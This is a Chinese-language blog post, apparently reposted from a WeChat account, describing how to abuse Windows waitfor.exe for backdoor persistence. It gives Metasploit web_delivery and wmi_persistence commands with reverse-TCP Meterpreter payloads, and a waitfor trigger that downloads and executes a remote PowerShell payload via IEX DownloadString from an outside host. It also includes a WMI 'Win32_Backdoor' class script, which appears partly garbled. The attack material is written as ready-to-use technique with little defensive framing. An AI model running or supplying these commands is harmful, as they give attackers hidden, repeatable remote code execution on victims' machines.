windows持久化后门之waitfor.exe

waitfor介绍

WaitFor.exe是一个用于同步网络中计算机的程序，可以发送或等待系统上的信号。它支持的操作系统包括Windows Server 2003、Windows Vista、Windows XP、Windows Server 2008等。其主要用途是实现域内主机同时执行命令。

WaitFor.exe位于System32文件夹下，以命令行方式启动。它支持多个参数，包括指定发送的目的计算机的名称或IP地址、使用指定用户帐户的凭据运行脚本、指定等待信号的秒数等。该二进制文件存储在C：WindowsSystem32文件夹中，这意味着需要本地管理员权限才能执行此活动，并且两个主机（发送方和接收方）需要在同一网段上。

waitfor利用思路

Metasploit Framework可用于通过使用“web_delivery”模块托管基于PowerShell的有效负载。

Shell use exploit/multi/script/web_delivery set target 5 set payload windows/x64/meterpreter/reverse_tcp set LHOST 10.0.0.13 exploit

"waitfor"命令接受几个参数，

/s参数指定将发送信号的远程主机的IP地址或者如果在本地执行可以使用回环地址，

/si参数通过网络发送信号，最后一个组件是信号的名称。

需要在目标主机上执行“waitfor”，并附加信号名称和PowerShell命令

Shell waitfor /s 127.0.0.1 /si sectest waitfor sectest && powershell IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.13:8080/sectestlaboratories');

当主机上接收到信号时，将执行命令并打开Meterpreter会话。

利用优化

这种方法用于持久性的问题是，一旦触发器命令被执行，进程“waitfor. exe”就会退出。为了克服这个问题，开发了一个PowerShell脚本，将命令存储在WMI类中，以便连续启用等待模式。

Shell $StaticClass = New-Object Management.ManagementClass('rootcimv2', $null,$null) $StaticClass.Name = 'Win32_Backdoor' $StaticClass.Put()| Out-Null $StaticClass.Put() | Out-Null $exec=([WmiClass] 'Win32_Backdoor').Properties['Code'].Value; iex $exec | Out-Null

一旦模块被导入，它将执行“waitfor”命令。

Shell Import-Module .Waitfor-Persistence.ps1

执行触发器命令将创建与目标主机的通信通道。该命令可以运行多次，因为“waitfor”始终处于等待模式。

Metasploit Framework还实现了将有效负载存储在WMI类中并使用“waitfor”作为触发器的技术。

Shell use exploit/windows/local/wmi_persistence set PERSISTENCE_METHOD WAITFOR set WAITFOR_TRIGGER pentestlab set SESSION 2 set payload windows/x64/meterpreter/reverse_tcp set LHOST 10.0.0.13 set LPORT 4444 exploit

执行后，该模块将在WMI类中安装任意有效负载。它还将生成需要使用的命令，以便再次检索Meterpreter会话。

信号可以从网络上具有shell访问权限的另一台主机发送到目标系统。

下面的GIF演示了如何使用“waitfor”二进制文件来下载和执行任意有效负载。

原文始发于微信公众号（暴暴的皮卡丘）：windows持久化后门之waitfor.exe